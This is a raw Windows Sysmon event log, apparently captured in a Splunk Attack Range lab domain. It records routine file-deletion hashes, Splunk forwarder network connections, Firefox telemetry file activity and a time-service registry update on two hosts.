08:04:37.296{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B591108C605F212359AC85CE97266CD1,SHA256=F6CA7A0F2C2CE7108032C864BDF44F149C9B5B77C8B25E25C9448E33979AEF2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809833Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:37.013{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40E2B14ACE5CC3077BDB2B3884225AE1,SHA256=8F5340C62F0F5E5D02DB4EEBF41A520725D49F14AF735A464F657A8A6D266B70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053423Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:38.645{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=CB0507ACECB304211DCE14DC0FDC6427,SHA256=EC81A3537AD8ADF3B4CAF56E53A720FCC313A414FF6A77F8B9665D3219BA9FE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053422Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:38.296{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5757E68744933B3770BC93FCD940435,SHA256=2222D61327740A682F95DF8F01748F2C2805C530358D66297923CCEBC4CE56E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809834Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:38.029{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E78988A6F651EA12433BFA965207F9E,SHA256=54E76FA209DC8BED54D2A1D3B144DFC80A11DDBC0ECC78B190372E0F3E497519,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053424Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:39.311{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0BDFF428F22B75C25121F13CE46EFA0,SHA256=5E840DD35C3EC8E7169DA81F5047173AAD39A1982CD5A4A8CEF1D8D259208C6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809835Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:39.029{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=894F34A84D54E00F0566347072D10CDE,SHA256=310A4828A4FBA7FF570F1D0A857B30E7096AF09598B5ECD258C9CBF3433B0BE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053426Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:40.315{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35C0664EFA3967AF03AE42459F97B233,SHA256=CE1BAF4D69BD6506326E2EB7B3A7B297351BECF2A2F2F7BFBCE4330415B72A11,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000809836Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:40.045{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=734AFAB180C6ECD2484320BB836E1F38,SHA256=105C9C4F8F2BFAA102531AACEB0BCC88A24455F314D1DE468AE98C6B2E29BB29,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053425Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:31.596{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61924-false10.0.1.12-8000- 23542300x80000000000000001053438Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:41.329{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C963413861309C09762C517163C83C3F,SHA256=1FD256AAAE3EBD801824AC709BA1319C348ED3CA0B3353FE00EB8149B7399D2E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809838Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:40.209{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57423-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809837Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:41.060{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5F9B21DC72E0F97A6E6A00B16668632,SHA256=33EF0027422B5266FA687917BCAA19D3EF0362E5373882FB95286A430F7144FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053437Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:41.045{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=FD8635D8D012BED953DA992CF1C89F4D,SHA256=549FA76B8850ACAFEBF81110D3E6653A51115C72732BDA2E0DD4EE364260D310,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053436Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:41.030{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E9190F29241629F1B6D800681C100B5E,SHA256=1CE1AD8E6E58E63EBC14FBDE27A28937D87BEE6E506A9C119F4C9B8E9ED9F878,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053435Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:41.030{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1260F906185D49F65215E844AB252BB4,SHA256=55C978C79451CB8646EBFF863E54A7185544FE1B9C125BCB5E55DDBF58F4D115,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053434Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:41.030{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=64C3041734D80D9D998D3364CE0E644C,SHA256=C7CEF39EA07648FBE6CF4BECCD1C826456D4E4DEAE80EF41B357FC72CAECEAF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053433Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:41.030{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A4ACDE12668D6234A76965BD1DC20852,SHA256=772E1FADDA8644BEACDF34144B31C23F4C191423B0718B8E7D95ECC88305F21F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053432Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:41.030{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BCBBA8DDF2C984A77F00B42FCE906F05,SHA256=CF81E76A3C366EAA6A782E43A929AE6D46B62967EFE7B81A51690E9D31AEB6FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053431Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:41.030{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F8BB3BF9A6D8691CA55C057A89363751,SHA256=BC1A5A3C94333CBB33EB01124A5998B04C748C1D04E07C17F77F424C9E04A967,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053430Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:41.030{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9212EE5EAC659C1C09936E8BA5861FCA,SHA256=B40F56BCF7BBC0C84B17C61826BECF0C689FB1AEBBFCDD61493908C610AC9F6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053429Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:41.030{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=0D6F28D072A36B45A04D3C81C3FD08B0,SHA256=7D05292E1A8086CF577CA957C88FA3F22A5A21D1FC13301CBBE76BBB9D779955,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053428Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:41.030{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=0E9A92E28F8A490233AC7DC608F98239,SHA256=67084E25B33DF1C7AB28C89D686743E204AA873BC49026D89D828F2BD26459AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053427Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:41.030{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7BBA2087AE43EDB29FB9F5DD99ED972B,SHA256=E58A213949C31D8B872F187B202F0E82C81089F22B64ECE30B8DE8526D6F62B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053439Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:42.366{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F15F2E155F595DD214EC524AA04C370,SHA256=ECBD2053E502985B95A934C82B4FE7C3E12BB55CD43104F268DCB13D9AC9E9B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809839Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:42.092{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36E403318BD6ADC485E860B7F94D38A5,SHA256=0793E1A221AB9E2AF4974392592CBA6850EA52D91C2B5B86CF46CAF22494B17F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053440Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:43.381{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3930375F77E5B73F067766778BBF2AA7,SHA256=7D8B71699C9A27FAFD6C8980F27CC71DC4457E53ECF526F0AAA8369B02CC11FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809840Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:43.107{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70D83C20299F0792A914632C8F10A507,SHA256=1EF41B018F17852B748BA78DE291C1327C2417883416FBF5ED29391FD03EFEF3,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001053441Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:44.396{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F262F16CAA396CDB7957773335A2D31B,SHA256=6EA3E34D7886E795953EB554EEC608C4F51E6E07D503E5F831E4542898A2BC47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809841Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:44.123{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF51036B175A6E44C173CF96E0FA8C05,SHA256=F9AF7A7B3DB01574A56518DB169E6ABC0D3607BDF48A5920B8A687A076160643,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053443Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:36.695{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61925-false10.0.1.12-8000- 23542300x80000000000000001053442Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:45.411{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66571F63B271D825637B73857C013D76,SHA256=59891E71C394AE380C72F7CAE6E59FC6FD68A0A8D03CBD0890A1C47A9F7A134E,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000809842Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:45.138{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACA84371D19E14206ECF56DD543EFA21,SHA256=F8094FB9C8506AAB0BC3BAE84B4E298DDDF495A19AE95C23BEF183EA4E498AC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053455Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:46.426{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69666971ED280E2F391AE7D51E71132B,SHA256=1BEE2FDD03535E911CD6788EC7D592935071C42EE44E6AC5578CDBFD630D0757,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809845Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:45.240{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57424-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 13241300x8000000000000000809844Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:04:46.482{0C1E0330-0490-60E8-1100-00000000D001}988C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d776f4-0x946a8e49) 23542300x8000000000000000809843Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:46.154{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75D04D4AA36800C6271C332B98CA99C6,SHA256=4C3738E715A192F61CB00C525CF79A58F05814CE606773FF2EB84A5CA586AF50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053454Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:46.064{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E70B0119E2FC34D8C8F1751222D06E2A,SHA256=19F2F7766BC54600DF6671A14C2548521950CE3CD035220E4E235E1B15988C4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053453Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:46.064{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=093B2B40F88A9FB052E5702160B1C500,SHA256=C60CB6997903E26CCC3C9297D05CD90380D88495889CDE53A41055C284F98114,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053452Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:46.064{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=34F539167181D87298AA1821CB68C25D,SHA256=A50AF58F8368FC9696156E132F6C0E44A426ADD6032385A5F663291957B4B0AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053451Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:46.064{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=EA311F0E2DD3CB03856D5134A4F84839,SHA256=945A07B3E93766C28D920E05E779E2405300D08C551290661792BC7F53021F68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053450Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:46.064{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C43F220FF237F9328789AAA7F835A874,SHA256=9D925D1E68F389098F8A5E99342A425D2D4D5F6F5E3A250A437A0869CF66D716,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053449Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:46.064{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=269A2AA2A2523178385AB3B10B805D8C,SHA256=FD88BBF9334E2163D83ADBCEF677A408980C61079891443EDE475DD9ECBD22F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053448Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:46.064{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=87E654171B7C8938CB59209C36347C9D,SHA256=33B7EE500773C99D60F516907B6C7A439BAA15E765C3E383D0EB7696EF160332,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053447Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:46.064{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=149D5819F537070750FC74B7D5D1942D,SHA256=9F676A89D09321E7C15F50E4E36C8AD1AAEFCEAD1F9F03BAD8B3616C793B84DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053446Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:46.064{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8D024F39F900B5C08343BBC254427D9F,SHA256=61B0393A0F3C7DCF2A588EF33F7B4D99D81DDA33DC8D59DD2CF76C8F9CE3768E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053445Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:46.064{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=28FF8F4A24CAEB1B8EDB8513106861B3,SHA256=436080004D8E7051F4EC0C8CB90733F3C0874E55A26ACF1A4A59904E35718657,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053444Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:46.064{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B68CA6A8B0D388CE9EE0DC62CEBF12A8,SHA256=1F905DE1DD5EB950194C54A8CEEC58F3C62CB907F2D89E3D3BF58FE32C7A78ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053456Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:47.426{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BE346BDB900A44D932E91B4A83135F1,SHA256=2981252B171075BD4409D3E440762DC384BA20324AFEB6575853CD801BA5B81C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809846Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:47.170{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA52B307778F042E0CE06C747887F807,SHA256=7091EF5C37699E03B463757046E8F4AA9E2D8E42487B6872EB470C1F2001AB1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053459Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:48.444{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50DB7738C6226630DAFD0CDEC2F00312,SHA256=A4AEDBAD9B73A10B35115CD9ABB7A9E8DBA9CBB52AA67A1C42EBAF91F71672FE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809853Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:47.167{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57425-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 354300x8000000000000000809852Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:46.861{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 
